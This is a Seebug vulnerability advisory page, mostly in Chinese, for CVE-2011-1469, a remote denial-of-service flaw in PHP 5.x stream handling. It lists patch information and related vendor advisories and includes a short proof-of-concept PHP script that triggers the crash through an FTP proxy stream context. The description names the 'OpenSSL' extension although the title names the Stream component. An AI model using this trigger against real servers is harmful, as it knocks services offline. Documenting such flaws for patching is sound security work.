Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:20393
HistoryMar 27, 2011 - 12:00 a.m.

PHP Stream组件远程拒绝服务漏洞

2011-03-2700:00:00
Root
www.seebug.org
45

0.015 Low

EPSS

Percentile

85.6%

JSON

BUGTRAQ ID: 46970
CVE ID: CVE-2011-1469

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP “OpenSSL”扩展在实现上存在拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,造成拒绝服务。

MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
PHP PHP 5.x
厂商补丁:

PHP

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net


                                                <?php

        $uri = 'ftp://www.example.com/pub/pkg-shadow/shadow-4.1.4.3.tar.bz2';
        $proxy = 'tcp://proxy:8080';

        $opts = array(
                'ftp' => array(
                        'proxy' => $proxy
                )
        );

        $context = stream_context_create($opts);
        stream_context_set_params($context, array());

        $fh = fopen($uri, 'r', false, $context);
        while (!feof($fh)) {
                echo "foo\n";
                fread($fh, 4 * 1024);
        }

        fclose($fh);

?>

Related

ubuntucve 1
veracode 1
cve 1
prion 1
oraclelinux 3
centos 2
openvas 28
nessus 21
redhat 2
debian 1
osv 1
ubuntu 2
securityvulns 5
f5 2
gentoo 1
ubuntucve
ubuntucve
CVE-2011-1469
2011-03-19 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 01:03:25
cve
cve
CVE-2011-1469
2011-03-20 02:00:00
prion
prion
Design/Logic Flaw
2011-03-20 02:00:00
oraclelinux
oraclelinux
php security update
2012-01-18 00:00:00
php53 and php security update
2011-11-02 00:00:00
php security update
2012-06-29 00:00:00
centos
centos
php security update
2012-01-18 19:55:58
php53 security update
2011-11-03 03:59:22
openvas
openvas
CentOS Update for php CESA-2012:0033 centos5
2012-07-30 00:00:00
RedHat Update for php RHSA-2012:0033-01
2012-01-20 00:00:00
Oracle: Security Advisory (ELSA-2012-0033)
2015-10-06 00:00:00
nessus
nessus
RHEL 5 : php (RHSA-2012:0033)
2012-01-19 00:00:00
Oracle Linux 5 : php (ELSA-2012-0033)
2013-07-12 00:00:00
Scientific Linux Security Update : php on SL5.x i386/x86_64 (20120118)
2012-08-01 00:00:00
redhat
redhat
(RHSA-2012:0033) Moderate: php security update
2012-01-18 00:00:00
(RHSA-2011:1423) Moderate: php53 and php security update
2011-11-02 00:00:00
debian
debian
[SECURITY] [DSA 2408-1] php5 security update
2012-02-13 18:15:24
osv
osv
php5 - several
2012-02-13 00:00:00
ubuntu
ubuntu
PHP Regressions
2011-05-05 00:00:00
PHP vulnerabilities
2011-04-29 00:00:00
securityvulns
securityvulns
PHP multiple security vulnerabilities
2011-05-01 00:00:00
[USN-1126-1] PHP vulnerabilities
2011-05-01 00:00:00
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
f5
f5
SOL13518 - Multiple PHP vulnerabilities
2012-04-04 00:00:00
Multiple PHP vulnerabilities
2012-04-05 02:07:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00

0.015 Low

EPSS

Percentile

85.6%

JSON
Related for SSV:20393
ubuntucve1veracode1cve1prion1oraclelinux3centos2openvas28nessus21redhat2debian1osv1ubuntu2securityvulns5f52gentoo1